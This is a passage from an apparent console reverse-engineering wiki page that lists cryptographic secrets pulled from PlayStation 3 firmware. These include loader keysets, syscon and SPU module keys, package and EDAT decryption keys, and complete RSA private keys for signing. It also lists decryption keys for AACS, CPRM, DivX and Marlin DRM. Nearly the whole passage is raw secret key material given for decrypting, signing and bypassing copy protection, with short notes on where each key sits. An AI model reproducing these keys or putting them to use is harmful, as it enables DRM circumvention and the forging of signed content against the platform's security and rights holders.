&lt;code&gt;4CC9A8A9EED889070F066EC9A7CADA2B&lt;/code&gt; || &lt;code&gt;577BA1CBF1FD40A3EF53C9B5DAC3AC60&lt;/code&gt; || &lt;code&gt;B64BF3D04FBB3F8D29F9E63A97DF3DA9&lt;/code&gt;<br /> |-<br /> | lv2ldr || 4.21 || &lt;code&gt;872D02292EE7ED3544AFF20EEA5E6F0C&lt;/code&gt; || &lt;code&gt;2E0CBBD250150410302F7E8B33039EF3&lt;/code&gt; || &lt;code&gt;A02BA1F74446E4BAE04AF5CF13D94154&lt;/code&gt; || &lt;code&gt;2009879EED2F443367C80B62F9D1748F&lt;/code&gt;<br /> |-<br /> | appldr || 3.60 || &lt;code&gt;EE409F8CD0B7F8AF17769D5F6D67EA3F&lt;/code&gt; || &lt;code&gt;6BF7B2D5B0ED87EF4CF601D53EEA111A&lt;/code&gt; || &lt;code&gt;2149690206DD0ABC0CD5367C4AF2C810&lt;/code&gt; || &lt;code&gt;39D8E32CF3F1558902247F733D5284BF&lt;/code&gt;<br /> |-<br /> | appldr || 3.65 || &lt;code&gt;D1FF8A1B7AD27A186B0F1E2FFF5C2B65&lt;/code&gt; || &lt;code&gt;4D5EC61604BCE8250E62600376061878&lt;/code&gt; || &lt;code&gt;8F40C9F3CEF5284F5F432BD906ECDF24&lt;/code&gt; || &lt;code&gt;0B107F57C095B31EF15B95FFEC5134B2&lt;/code&gt;<br /> |-<br /> | appldr || 3.70 || &lt;code&gt;2AF91823CE38598E8D66245F698AB572&lt;/code&gt; || &lt;code&gt;D1A74E3DED98145F023F07FFB60D2B1D&lt;/code&gt; || &lt;code&gt;04BE8DD318D3E7454A166296B022F88D&lt;/code&gt; || &lt;code&gt;16D3B1E7B007FDFE101C029B5F39C761&lt;/code&gt;<br /> |-<br /> | appldr || 4.11 || &lt;code&gt;6BFAFA124D4B88841BCB861364C32826&lt;/code&gt; || &lt;code&gt;3F7679B0A1430C490C1F249EAA468D2C&lt;/code&gt; || &lt;code&gt;4338700B5FA64276DD3E57806ED679FD&lt;/code&gt; || &lt;code&gt;CFCAE1AF6F98E5651CBB021D78DD8F1B&lt;/code&gt;<br /> |-<br /> | appldr || 4.21 || &lt;code&gt;AAF65A91EC372C690969090F59E53C3E&lt;/code&gt; || &lt;code&gt;A5798C254313BC5416951E24EAD3C985&lt;/code&gt; || &lt;code&gt;66BCB417D14A2B592640801C11B7B49B&lt;/code&gt; || &lt;code&gt;2FF236152A4776DAD39B509244E8F5C2&lt;/code&gt;<br /> |-<br /> |}<br /> <br /> == Scrambled keysets ==<br /> {| class=&quot;wikitable sortable&quot;<br /> |-<br /> ! Type !! Version !! ERK || RIV<br /> |-<br /> | rvk_prg || 3.60 || &lt;code&gt;FB9CC7277F95F77E63618488AE38DB9C5226D988AF79CC4C0F49EC983FDC96D4&lt;/code&gt; || &lt;code&gt;E06DC9567BE0EA09D5D1A5355B996FC6&lt;/code&gt;<br /> |-<br /> | rvk_prg || 4.21 || &lt;code&gt;1FAED95E0BAB4BD4F9CAF9F9C0DAB5EBEFFB6CDAD6482ABF60DD73B0EA3FD0E8&lt;/code&gt; || &lt;code&gt;30B9F738238A015014A44DD57B3A1661&lt;/code&gt;<br /> |-<br /> | isoldr || 3.60 || &lt;code&gt;7CFE82A405C29EBE20BBA96BB1D1F6E9F31A01BF179018BE26F079808361ECF1&lt;/code&gt; || &lt;code&gt;B3E9683977AE89DE9AFFE6330774505C&lt;/code&gt;<br /> |-<br /> | isoldr || 3.65 || &lt;code&gt;1626B646CC8A8198DAC725CF616C442D855A1E3FBD5824BA9AA36F5FBC345CA0&lt;/code&gt; || &lt;code&gt;2E691E3343A55B99E8A935B0443BD67B&lt;/code&gt;<br /> |-<br /> | isoldr || 3.70 || &lt;code&gt;7DA7D447D0FD4088FFF2B858A266FEFECB3D2E79D68BCC0A70FF8B381258EFA7&lt;/code&gt; || &lt;code&gt;E46F02FDCA9F40CC5CD715D930190FE0&lt;/code&gt;<br /> |-<br /> | isoldr || 4.11 || &lt;code&gt;B2306998F30DEF6750E01674BCA38D46F8FAD1548B456C4F7869296F7DC27E83&lt;/code&gt; || &lt;code&gt;2912F5FC4C4FF400940B369193303D16&lt;/code&gt;<br /> |-<br /> | isoldr || 4.21 || &lt;code&gt;A4609638DC47355D6D7915F26E3837A1A02528AA7A1A27542231997EB4F7143D&lt;/code&gt; || &lt;code&gt;36762D06A6F6FBFFE342D8853A3CD440&lt;/code&gt;<br /> |-<br /> | lv1ldr || 3.60 || &lt;code&gt;18097966C3DE8A0D82BF956CB39FAF782295C6CA7F1E547AB30EDFD7EE5CB812&lt;/code&gt; || &lt;code&gt;9B32B20FA77280F1095EA13F1C2D5C99&lt;/code&gt;<br /> |-<br /> | lv1ldr || 4.21 || &lt;code&gt;189615862C02E6278760BA3A19C8BF0C176B6EDD491A40F2F3ED0091CEFA28C3&lt;/code&gt; || &lt;code&gt;E372B32F7E439D30AC6CEC68CA23D903&lt;/code&gt;<br /> |-<br /> | lv2ldr || 3.60 || &lt;code&gt;451E4179EF01987D64EA48841DCA5AA7CB3D6ADB8D880F52DAEF543E654BAE3F&lt;/code&gt; || &lt;code&gt;E8831E56EF9FA4D8D4BF7A6E78025644&lt;/code&gt;<br /> |-<br /> | lv2ldr || 3.65 || &lt;code&gt;2A0E7FD3DA4AC74D4AB2DD6AF36FED41CD5F50DECB7FC945F81A85460E141739&lt;/code&gt; || &lt;code&gt;FD9D731564C1D1F0A4258667100D1F17&lt;/code&gt;<br /> |-<br /> | lv2ldr || 3.70 || &lt;code&gt;7E115E8C38BEA057858E97F670EB3E6E2B8FA04C059422CC9273EF12335679B4&lt;/code&gt; || &lt;code&gt;90A06C54C727844AB5300BB6AB54C537&lt;/code&gt;<br /> |-<br /> | lv2ldr || 4.11 || &lt;code&gt;ECFAC7BA2F1BFA198A834EBC25B4FBD47448764A6E79A200C26948141A26B794&lt;/code&gt; || &lt;code&gt;CF33BDA9F55C71BD9F38B31162FCB0E3&lt;/code&gt;<br /> |-<br /> | lv2ldr || 4.21 || &lt;code&gt;B0B020CE5DE730AEFCD3778273F0F91456EBCCE8F184FC257D37E0182D20D328&lt;/code&gt; || &lt;code&gt;2D4C6F9F0AAF26A728CA166D03449321&lt;/code&gt;<br /> |-<br /> | edat-key-0 || 4.21 || &lt;code&gt;270C4A349DE7A329BB04FD8642C43591&lt;/code&gt; || <br /> |-<br /> | edat-hash-0 || 4.21 || &lt;code&gt;25790BA9D671FB125E53F013B0F9862E&lt;/code&gt; || <br /> |-<br /> | edat-key-1 || 4.21 || &lt;code&gt;D1DF87B5C1471B360ACE21315A339C06&lt;/code&gt; || <br /> |-<br /> | edat-hash-1 || 4.21 || &lt;code&gt;6D4BF3D7245DB294B6C3F9E32AA57E79&lt;/code&gt; || <br /> |-<br /> |}<br /> <br /> = Key lists =<br /> <br /> == sc_iso module 060.013.r010 - 4.75 ==<br /> 0: <br /> 1: <br /> 2: D413B89663E1FE9F75143D3BB4565274 (060.013.r010 - 4.75)<br /> 2: 73636B65795F7365726965736B657900 (INTERNAL)<br /> 3: FA72CEEF59B4D2989F111913287F51C7 (060.013.r010 - 4.75)<br /> 3: 73636B65795F7365726965736B657932 (INTERNAL)<br /> 4: DAA4B9F2BC70B280A7B340FA0D04BA14 (095.001 - 3.56)<br /> 4: 29C194FFEC1FD14D4AAE006C32B35990 (3.60 - 4.75)<br /> 4: 73636B65795F666F725F6D6173746572 (INTERNAL)<br /> 5: <br /> see also: http://pastie.org/3130817 / http://pastie.org/10206783<br /> <br /> == sb_iso_spu_module 083.006.r010 / 1.02 ==<br /> 0: 8E73EE9994E8A11C12300C34DA92D07FD8636E434C8FCA02 &lt;- sb_iso_magic_px<br /> 1: 9D013CBE2D46368B4DB782FF2472ECE64237F3538827416E &lt;- sb_iso_fix2_px<br /> 2: 086998B739554A8022372B883465DE5F718FC15DEE636447 &lt;- sb_iso_fix1_px<br /> 3: 534740F254E3F83503BBD7DE9F091B67325F31A00C78F2A9 &lt;- sb_iso_magic_dx<br /> 4: B62AB069608519CC7F69FC16D673ED085998A24A40B06AFF &lt;- sb_iso_fix2_dx<br /> 5: 8094270BA87742F383F109F9C7D9E9755C4E343D81D2A3D9 &lt;- sb_iso_fix1_dx<br /> <br /> == sb_iso_spu_module 3.41 ==<br /> 6: C51272E64D9A15CA445CD2F3795C15B81B192C7AC15883F4<br /> 7: E618B3A4EC2789DAFC2ED2DFED75A93FA7B55AEA201278A4<br /> 8: D7C0AC46B1CD3E7345A0F0DAF921F6DDDA03A37905FBB17E<br /> 9: E3F22665AFC4E1C014A431241DBC0B69D5D66857D91E6B27<br /> A: 66866AF7489AE85ABF98A670AA27672E066E60D14D524121<br /> B: EB9706B9A75A48853BD4035ADE936E050E87E742D27A8609<br /> note: 1.02 contains 6 keys, 3.41 contains 12 keys (it also includes the 1.02 keys)<br /> <br /> <br /> == sv_iso_spu_module 095.001 - 3.55 ==<br /> key_0: EF4F6A107742E8448BC1F9D8F2481B31 //key_0 is an aes_cbc128 key, used with zero iv<br /> <br /> iv_0(giv): 2226928D44032F436AFD267E748B2393<br /> key_0_0(kms1): 126C6B5945370EEECA68262D02DD12D2 //key_0_0 is used with iv_0 to generate gen_key_0<br /> key_0_1(kms2): D9A20A79666C27D11032ACCF0D7FB501 //key_0_1 is used with iv_0 to generate gen_key_1<br /> <br /> key_1(Kwm): 7CDD0E02076EFE4599B1B82C359919B3 //key_1 is used with iv_0<br /> <br /> iv_1(ivs_aes): 3BD624020BD3F865E80B3F0CD6566DD0 //iv_1 is used with gen_key_0 and gen_key_1<br /> <br /> key_2(Kh): 380BCF0B53455B3C7817AB4FA3BA90ED //key_2 + iv_2 are used to generate something from the disk name (id?)<br /> iv_2(IVh): 69474772AF6FDAB342743AEFAA186287<br /> <br /> debug_disc_fallback: 67C0758CF4996FEF7E88F90CC6959D66 //this fallback is used if the disk name (id?) is 'PS3_L_DEBUG_DISC' (used on PS3 and PS4?)<br /> <br /> ivs_3des: E80B3F0CD6566DD0<br /> <br /> eid4_fallback_0x00 FF1471C135E4593D0D27F9CAA3795BD9<br /> eid4_fallback_0x10 DD38369F0175173CE32BEED051FD4EF3<br /> <br /> eid4_fallback keys added from this [http://www.ps3-hacks.org/ps3-scetool-friday-isolated-spu-poc-and-eidtool-wip-updates.html source]<br /> <br /> trivia(you can find these in the middle of the keys) http://pastebin.com/mWxb3Zxj&lt;br&gt;<br /> ivs_3des also exists in lv2_kernel, as well as ivs_aes<br /> <br /> == spu_token_processor ==<br /> 095.001 - 3.56:<br /> token-hmac: CC30C4229113DB25733553AFD06E8762B3729D9EFAA6D5F35A6F58BF38FF8B5F58A25BD9C9B50B01D1AB4028676968EAC7F88833B662935D7506A6B5E0F9D97A<br /> token-key: 341812376291371C8BC756FFFC611525403F95A8EF9D0C996482EEC216B562ED<br /> token-iv: E8663A69CD1A5C454A761E728C7C254E<br /> 3.60-{{latest}}:<br /> token-public: A55476C9E6DFB890FAAF5FBFFD961B649D0ABF1D0CD76000BD4B5F5AFE0AB87DCEA221E252A37404<br /> token-curve-type: 0x9<br /> <br /> 08x - ???{{SD}}<br /> token-hmac internal: 646AC0DF49C333626C15F9C7CCDAE62DD882FBD223647AF41776E14D35984538CC525636330272EF7F26D883FB7041B44C2925485F9570F04DA2D18B7DA4CF1B<br /> token-key internal: 8801A471102853DC867247974B68F9361EAD861C3A09346FEF25FE36D15751CA<br /> token-iv internal: FEA685F720B0C60A65DC97B8B2C8BCB3<br /> <br /> == spu_utoken_processor 3.55 ==<br /> utoken-hmac: 572C987747A4A0A6A1E715963D0DCCCA28A8A94B5B529472EF1A4EFFEB2978F99BD0A9D42438DB731B443C9DC7944A13AC7B40FCA57DFE33D212FBA86CBEBCBA<br /> utoken-erk: D1CB1C81ACE35F3D970DDE723A622935516F98D0F0DB3E151DE2B7A2E34BD736<br /> utoken-iv: A6523E5426470953FE8C90F61BCA927A<br /> <br /> == sc_iso ==<br /> secure_com_lib_internal_key::BE_SC_PayloadKey: A3ADB99A21E47ADFF3FD7FC3173981CA # 060.013.r010 - {{latest}}<br /> secure_com_lib_internal_key::SC_BE_PayloadKey: 6933CEE7A518E5B8CBE1FC14B261B765 # 060.013.r010 - {{latest}}<br /> secure_com_lib_internal_key::FactoryInit_Password : 2EA267093B4556ED9D3BE62E115D6D59 # 060.013.r010 - 1.70<br /> sc_key::old_auth_key_1_0x00 : 13163A92B50513542C18ABAD31B85FB7<br /> sc_key::old_auth_key_2_0x00 : 2BC8BB73F4B59AC658A737A5DD535DFE<br /> sc_key::old_auth_key_1_0x01 : D6C374FCDFF8C3CF44018C78733BF5B2<br /> sc_key::old_auth_key_2_0x01 : 648B9FF94EF321C69A4AE596F2F08D22<br /> sc_key::old_auth_key_1_0x06 : 626C7124FC5BA1AF7436389BA37C6654<br /> sc_key::old_auth_key_2_0x06 : 9D94BE461CAF083C9D9FA185C93AEE7B<br /> sc_key::key_for_master : 73636B65795F666F725F6D6173746572<br /> sc_key::series_key : 73636B65795F7365726965736B657900<br /> sc_key::series_key2 : 73636B65795F7365726965736B657932<br /> <br /> == gpkg-key ==<br /> ps3_gpkg_key: 2E7B71D7C9C9A14EA3221F188828B8F8<br /> &lt;!--//u8 retail_pkg_aes_key[] = {0x2E,0x7B,0x71,0xD7,0xC9,0xC9,0xA1,0x4E,0xA3,0x22,0x1F,0x18,0x88,0x28,0xB8,0xF8};//--&gt;<br /> * Location: nas_plugin.sprx , from fw3.55cex: sub_36EEC, offset: 0x361F6@elf file.<br /> psp_gpkg_key: 07F2C68290B50D2C33818D709B60E62B<br /> * Location: nas_plugin.sprx , from fw3.55cex: sub_36EEC, offset: 0x3724A@elf file.<br /> psp2_gpkg_key0: E31A70C9CE1DD72BF3C0622963F2ECCB<br /> psp2_gpkg_key1: 423ACA3A2BD5649F9686ABAD6FD8801F<br /> psp2_gpkg_key2: AF07FD59652527BAF13389668B17D9EA<br /> <br /> == service mode dongle HMAC ==<br /> 46DCEAD317FE45D80923EB97E4956410D4CDB2C2<br /> <br /> == PUP HMAC ==<br /> F491AD94C6811096915FD5D24481AEDCEDEDBE6BE513724DD8F7B691E88A38F4B5162BFBECBE3A62185DD7C94DA2225ADA3FBFCE555B9EA9649829EB30CE8366<br /> <br /> == DAT ==<br /> dat-iv: 3032ADFCDE09CFBFF0A3B3525B097FAF<br /> dat-key: 2B7E151628AED2A6ABF7158809CF4F3C<br /> <br /> == EDAT ==<br /> edat-cypher-key-0: BE959CA8308DEFA2E5E180C63712A9AE<br /> edat-cypher-key-1: 4CA9C14B01C95309969BEC68AA0BC081<br /> edat-hasher-key-0: EFFE5BD1652EEBC11918CF7C04D4F011<br /> edat-hasher-key-1: 3D92699B705B073854D8FCC6C7672747<br /> <br /> == SDAT ==<br /> sdat-key: 0D655EF8E674A98AB8505CFA7D012933 (sdat-sha1: ED2A015EEB1BD0CE06D0447F1A22AF4C1C401E4A)<br /> <br /> == PS3 Minis ==<br /> ps3minis1: D6606A6B2499CBDA5FA09081C5CDBD8A (SHA1: F72D80C2386010667F8A75DEB026A011D5ABA570)<br /> ps3minis2: 625E777946626A37336E3A5D4A6B714B (SHA1: C218DAFEC53C8DEAAC9A9E3D2B9C1C6A48371F9F)<br /> <br /> Note: for minis iso.bin.edat<br /> <br /> == aim keys ==<br /> aim_ks_4 : 30B0395DC5835AAA3A7986B44AFAE684 &lt;- idps_magic10<br /> aim_ks_1 : 2ED7CE8D1D55454585BF6A3281CD03AF &lt;- idps_magic<br /> aim_iv : 51F78B72A64711CF5C72323FB8607A00 &lt;- magic_iv0<br /> aim_key : 922B198CDF0C07DCCE848B69882D804CC23F19C2EAE1244F35AF176F7FD37851 &lt;- magic_key0<br /> aim_compare : 401C4AA63B2C8D44E245F074DAE7782A 360D1E8EE2116BDF6F0D8A3CC17BE38F EA48B571F4D26DED0000000000000000 (1.00-3.42)<br /> http://pastie.org/2547291<br /> (ks version depends on the first four bytes of the eid) &lt;br /&gt;<br /> aim_compare-&gt;magic_0(note that there's magic_1 and magic_2 also on really old firmwares)<br /> <br /> == mode_auth_data == <br /> key : FEDCBA98765432100123456789ABCDEFFEDCBA98765432100123456789ABCDEF<br /> iv : 0123456789ABCDEFFEDCBA9876543210<br /> hmac_key : 123DA14B3D21D82AFC759A9CF6F41610A24EC8704306BAC4E0941A5B70EEA037<br /> F1482EA7EC578872F1482EA7EC578872F1482EA7EC578872F1482EA7EC578872<br /> magic : 52796F7461726F206973206375746521 (Ryotaro is cute!)<br /> http://pastie.org/4155189<br /> <br /> (Product Mode authentication data)<br /> <br /> == SYSCON_MANAGER_KEY ==<br /> <br /> D413B89663E1FE9F75143D3BB4565274<br /> <br /> [[Keys#sc_iso_module_1.00-4.00|sc_iso_module_1.00-4.00]]&lt;br /&gt;<br /> [http://www.ps3hax.net/showthread.php?t=68857&amp;p=721426 source]<br /> <br /> == AACS key/iv ==<br /> <br /> aes-256-ctr_key:<br /> 995FE3C3AB857BFCD853F1ABE796799D0E2093B2F7E094AE39CD88A2AC879F96<br /> aes-256-ctr iv:<br /> 802794556C7716719B40A175DB9A455E<br /> [[http://pastebin.com/kasHaXKp Another decrypted arrays with this key]]<br /> <br /> <br /> magic: FolkloreJam<br /> <br /> key:<br /> 2DC2DF39420321D0CEF1FE2374029D95<br /> iv:<br /> 0BA0F8DDFEA61FB3D8DF9F566A050F78<br /> <br /> new magic: CODEFACE<br /> <br /> public key 1 enc:<br /> 453C8B51307C4D15621C5D9D23D35BC3CE5F34136825B970130CFCCE0799F03D66004B25CF3EB6E2<br /> public key 1 dec:<br /> 63C21DFFB2B2798A13B58D61166C4E4AAC8A0772137EC638818FD98FA4C30B996728BF4B917F6A27<br /> public key 2 enc:<br /> 5EB2636DE15990A675AF74634DBFD2F48BD9802D7B468C231DADEAC26EB4B82B7EF900EE3193D122<br /> public key 2 dec:<br /> 784CF5C36397A4390406A49F7800C77DE90CB34C001DF36B8F2ECF83CDEE438F7FD1F4806FD20DE7<br /> public key 3 enc:<br /> 26FE96AE82CE349F71A9D0FC35BF158962D533617B5B7F4892832541A35AFBA40128F46E5E41DCC5<br /> public key 3 dec:<br /> 00000000000000000000000000000000000000000000000000000000000000000000000000000000<br /> <br /> Curve:<br /> &lt;pre&gt;<br /> p = 9DC9D81355ECCEB560BDB09EF9EAE7C479A7D7DF<br /> a = 9DC9D81355ECCEB560BDB09EF9EAE7C479A7D7DC<br /> b = 402DAD3EC1CBCD165248D68E1245E0C4DAACB1D8<br /> N = 009DC9D81355ECCEB560BDC44F54817B2C7F5AB017<br /> Gx = 2E64FC22578351E6F4CCA7EB81D0A4BDC54CCEC6<br /> Gy = 0914A25DD05442889DB455C7F23C9A0707F5CBB9<br /> &lt;/pre&gt;<br /> <br /> Second aes-256-ctr_key:<br /> 6634510EF3D58392B8689C487AEC8CF2AC90663B354D580B90FB98FE7DB5C384<br /> Second aes-256-ctr iv:<br /> BC0D7738D332B780A6F89ED022745F0A<br /> <br /> == CPRM ==<br /> Decryption key for obfuscated arrays:<br /> <br /> Key 688D8FECC3AAB50AAE45506B41A48BC3<br /> IV 6AC5B2F7055C031AE36BA31D285D24E5<br /> <br /> Decrypted array 1:<br /> 3AD09AB6F5C116B758F6EDE6D98C57FC<br /> FD4B9B470E8EFFF3BBBA0A8015D72B36<br /> 6A435A89B45D71198FA088B8E88AC3AE<br /> 7C4E3DB596CC21001A6B12DB1FE4119D<br /> D39368B07F3B52B994DDA51B466031EC<br /> C9F8E95E1398BF27560891E36F2040B2<br /> 2CCE0210E018D56CDECD8779AFA92650<br /> F233926EC03F3941AA5B7D2403D62FEB<br /> 0B99864C51458D2EEF077BE24D7AFE25<br /> 5C29A2A8B1F0B3C4307E6338CBF44FD1<br /> DF4432DC175F662A819E774A656734FA<br /> 541E14BE04F1A79C8B37EE85AB220F69<br /> C5D40584A47342A164E1708390C2480D<br /> 611CC672FB7674E701D8C8D275A3CF28<br /> 821D4935C7BDCAA6AC0C62ADF93CEA2D<br /> 59DA3E976D09F755E523539F06BC9578<br /> <br /> Decrypted array 2:<br /> 009153EE3EC7524B0000000000000000<br /> <br /> == AV CC Multi ==<br /> <br /> 942C152C1C2C9D2C94AE15AE1CAE9DAE<br /> <br /> == Archive keys ==<br /> <br /> FA72CEEF59B4D2989F111913287F51C7 generic key<br /> <br /> EA02CEEF5BB4D2998F611910D77F51C6 per console key<br /> <br /> == Marlin DRM ==<br /> <br /> DES key/iv? 7563686979616D61 <br /> <br /> KeyRing SHA1 Seed? DAAA8CE98DFA1563A5E3E27FBBCF6443<br /> <br /> == DivX DRM ==<br /> <br /> Key 0678CE0EC45DA9554D2CDA549B91BC1C<br /> <br /> == Arcade Master Key ==<br /> <br /> Key 359F59BB8C256B91093A92007203ABB33BADF5AC09A0DC005859D6F159C4F54F<br /> IV 929214D8FCCB4CE7099ACEBDFC6612B9<br /> <br /> * used for encrypting Arcade/SYSDB ENCDEC/ATA Seeds<br /> * located at Lv1Ldr<br /> <br /> == Arcade ATA Decryption Key ==<br /> <br /> Key 5F20A21ED12FF6425B62FDE0D1881C8464131BE76B28CE9A<br /> IV 00000000000000000000000000000000<br /> <br /> * algo is aes-192-cbc, used for System 357A (GECR-1100)<br /> * Key forged by encrypting Arcade ATA Seeds with Master Key<br /> <br /> == SCEI_AD_SIGN AES CBC Master Keys ==<br /> RIV0: 8ceb482d10befb61871b6407dcfce7a3<br /> KEY0: 3683a2fae5e62fc59004db1911c0562f<br /> RIV1: 08080b7163e4fbabc2905023d430fc92<br /> KEY1: c4b92b1e1fc6429ae63701340336a529<br /> <br /> * Location: lv2_kernel.self<br /> * Those decrypt 2 0x420 (blaze it) blobs inside lv2 kernel<br /> * Found inside 2 0x40 byte encrypted seeds. Magic SCEI_AD_SIGN inside<br /> * See https://pastebin.com/7gmyRRzy<br /> <br /> == SCEI_AD_SIGN RSA Keys (External)==<br /> <br /> pub : BB75227C7CE52660799A0DF40B4A789B6D74386E86EC14589CD7BAE6E6D883315365639415FB5919E6C015B1CB379D77F4B5AD5DA6B10ACD65DD3E94DC4973596A44F397AE493CF74CDBCD4305C532B9B7FC3F077036F49EBB8D2F9858BB0032470275582D5AE01C7D83A5B082AE58F9EAAF07304C948B1211416F4A13453F61<br /> exponent : 010001<br /> priv : 045EDEC6F8427F7A905B3F28097B5B0484B0C9000AB546642A83FD1F9512473CC72CFDFD5DE5D655FC434E3E2EF6C4FD1EFF7D634997A720D2D72DB65ACC7B9BF7CE79CA35DC9E28693A852B18F935CB1BFF1D6586C40393FECCE5A6E764CCBA30E373F37ACBD6FE154E54D658130F6A12C993D5C8CF44995332C417BB687361<br /> p: F551D70C7104CFD27F8A543E1DE89ECCF1173062D81B509382E7E99A6EFFE046AC6C1E9FA277C3E0A92AE3C1C81D8B28EE56C83AF307733324D287DD555DE3E3<br /> q: C39E677C8DE1E8F3502D8D85E31E75B6DD4EB567952B54F6B7D3703EBE386C7CC1D9E24AD8BD482452EFDA9D7CAD094539633300A26C0501CE42CADC12501AEB<br /> dp: 3CA10659FFD0A5A02B7F3F84BE959031AC6003C85A0A9E2666D2F42C03C4DF63F8171C966D6BD6103F1EE77D2BFD09388B770D336C7EE9DCB8FC0332137809EB<br /> dq: 3EB4B857A4E395D8E90AB12309FAE9A104B006567DEAB601A04B96DF85FA704C4D979A828397A9587B7D87869440A3881D2D3F5C24B49BA64888009F2AFFA2A1<br /> invdp: E8DD3C07131550C4093A36D1C8DF108786C97F5628244CF3F60BF1437FC939659B0A9956412742AE2A3FF7BD82D7901B21A90FD20FCA5A92DBF4C1FDD7CD8CD3<br /> <br /> * Location: lv2_kernel.self<br /> * Used for popup ads<br /> <br /> == SCEI_AD_SIGN RSA Keys (Internal) ==<br /> <br /> pub : 81CB2FEFB597AB59D7374B2897931501229DBDE307151C20082623C8AA82F5DAD7EB0AE836132E3609D70EAB6E0256DB90634CEECF889B83BCB3383BBA73B320C95BBDEAFD8DA7C3DBBB8231313C82F607CC1E7036BA4A5D60E7AB3F41983249F8096EA1232053D8D185DBB43088EBDD6264BB5F609CF2389229CAF2634385FF<br /> exponent : 010001<br /> priv : 03AEC3B3EDF7993589DD38453513C7C749F7A6D11FBCD218F8923876B39BD6A4F876634F566571ECB797C2034C3245CBA20BA73DA966CB5ED00657C49E14355360F200549A657782C0EC5222F680F4815276796CB3F6C20074F9F5F1C45DCB1114BCA83A23FE8C34D6F73AF5B19A83D0AC60FFE09FCC8E13AB52D6FD5206AB49<br /> p: A7C32A8796127FF2DB879B17481F87BD0C37A3F0D66DF3F84BED83F7B753566420C08D4A28B92588385E05C43AD0387B2A9F99AB41B3B846EE4EE6FDDE5B6DA9<br /> q: C60F9FA06E2604BFA9CDBE093BA89434C9C55E0B440319DBD398360C3AD3039082FF3B211E3D9396715BE2C0511B48DE708923F548AB6DD0AE7459D942118F67<br /> dp: 3A2568094497B6E73AF5BE688C63F94D29FDE301A7A0C68DC9EB51F13B06548C31D9EB5EC7CC9C58A188DD20CD6DBC15DC8922DEFBCFC9D033EAFF1F00C1D9B9<br /> dq: 17E0B850E216A949E611CCD05625EBC035771AF066C1ACF3689E181DFF55833F7FDB7F686DB9E4BA256E7B76CE106907902FA86B20D8B2038F94AD6458E7BF0F<br /> invdp: 48A78458DCA3827D6BA22152B77913E590DA30978B9DB25048C4D45C74B7B375739C39C77CF2F4828DC4483F2A89EA5E3842CC96D9906FBB5E1C52E11B0962DE<br /> <br /> * Location: lv2_kernel.self<br /> * Used for popup ads.<br /> <br /> == Trophy RSA Keys ==<br /> <br /> pub : CA30CEE59BF19E041F6F02C54AE42CD6769185E157AB8659B70DCEC0C3EE6039FF952FD9767D35474B11BB5514205C553864F77BD4DA899B30110B0EA4F8AD33FBE0350E085B2A92A7D327978110AAB95085730235408156707C3B2238F978BFF4F308063809AEAFB2F9AEC62E1968CFF58B9BA834B3588C92C8411C548BFC49<br /> exponent : 010001<br /> trns_pub : CE8A7F561F08EC50EAD12C1CD5EA95F914574E52942E1D25D944319704ADC3E87FDE0E0451EDA05C347BBA584E7572F9660D18014E444C46C8EE8ADF10F4A1345FE51EF42D94A1A9DE692CE99702AAC4D4C5E528EFADBA5B53B20A50B686D084307EC3EABB61157E5E00A96A374FBF5C570B804D821C17573C1C00ACF29CF5E7<br /> SceNpTrophyXmlShaHmacKey : 6AC0B3FB1EBB4FB7BCC2A00DA3A2A4BDBCB788EC456748CC86CD9D09EF37937F6EE31167778E414E9B711BE9D8CBB5F8956E454EE94A46C39DC4FF0D090B92B7<br /> <br /> * inside np_trophy_util.sprx<br /> <br /> == CFK1 Master Keys ==<br /> <br /> INTERNAL_KEY0: 43464b31303132333435363738393a3b3c3d3e3f404142431a643e8a7af5091136a7749cedf481ef0aff55cde122f9c47e1c94f082536a1f244b9a9ce08da5e8<br /> INTERNAL_KEY1: 2b7e151628aed2a6abf7158809cf4f3c14d5fa4317d81dc5b144afcd06773f3daabe101959c477a164d31f08a51652862cd3e6efa98e49cd2a4f13380e5d897d<br /> EXTERNAL_KEY0: 43464b31e80749ef395734ad4d592952a15c72255e4ebdf6fb2b7a7e9cb2cfd4bbe145a325ce53afb978047edd426df7d9e97c8ce02e7c2215013d9f9870e5da<br /> EXTERNAL_KEY1: 7bddd39f9b2c22af82669e340adea35bf6c9b64d53fd6d8baf42ed64086cb4a7d8ff0ac1861eb27b7959c1e5e5278b05daf775c8bae7a47ce9a81e83da08ea6e<br /> NEW_EXTERNAL_KEY0: 43464b31136ae3119c9b783d35d6db6c6744a816d6815b8849e69651828d7e0b7e0a75a6a9a22bae2f91b521c2e07cca5b3cc8d7ca63eb0b7298b23d26640185<br /> NEW_EXTERNAL_KEY1: d6ed26424c55c55994b586335d9254d355202a1200eef1b5d65661020ec8feffb14f8b47667bdfc0612328527d525b1973f9f1e1f8bfec7bb87db94c0d8b933c<br /> <br /> * Location: lv2_kernel.self<br /> Added in 3.10. Seems to be Cinavia related?<br /> <br /> == PME Vectors ==<br /> reset external decrem syscall<br /> 482D2D34 482A4F70 482A509C 482A50E4 &lt;- internal<br /> 48202658 482023D0 482024FC 48202544 &lt;- external<br /> 48079C94 4806E624 4806E750 4806E798 &lt;- mambo_internal<br /> <br /> * these denote the location of several things inside lv1. TOC is in the third entry<br /> <br /> == Modules ==<br /> <br /> ==== Notes ====<br /> * in CEB Ebootroms, Sony uses the same 256bits keysets for self/rvk (lv0 uses lv1 keyset) than the ones initially available until 3.30 with a broken aes256ctr (yes, they use a 256bit key)<br /> * With Ebootroms themselves, only the first half is used on ceb2010-2060 ebootroms <br /> * Likewise, the individual_info erk is 256 bit size, but only first half is used.<br /> <br /> <br /> ''A '-' means that the cell is empty, because the version does not matter or the private key cannot be calculated (see 3.56 and later below) like has been done in 3.55 and earlier. See also : http://www.mhlavac.info/wp-content/uploads/downloads/2010/03/lec2.pdf<br /> <br /> * &amp;lt;= 3.55:<br /> ** Randomfail present, thus when private key is unknown: use scekrit ;<br /> ** No obfuscation added to loaders yet, thus keytable as seen inside loader are the keys used by crypto engine (in SPU, or key as used by en/decryption tools like scetool)<br /> * 3.56:<br /> ** Fixed the randomfail in 3.56 and later after the fail0verflow presentation at 27C3, thus scekrit is of no use, see also: [http://www.instructables.com/id/Understanding-how-ECDSA-protects-your-data/?ALLSTEPS] ;<br /> ** No obfuscation added to loaders ''yet''<br /> * =&amp;gt;3.60:<br /> ** fixed the randomfail since 3.56, thus scekrit is of no use ;<br /> ** Obfuscation of keytable was added since 3.60 see [[Keys#Key_Scrambling|Key Scrambling]], which used [[Undocumented SPU Channels|ch72]] ringbuffer seed for deobfuscation.<br /> *** &quot;dec&quot; in ldr table refers to the deobfuscated key as used by crypto engine ;<br /> *** &quot;enc&quot; in ldr table refers to 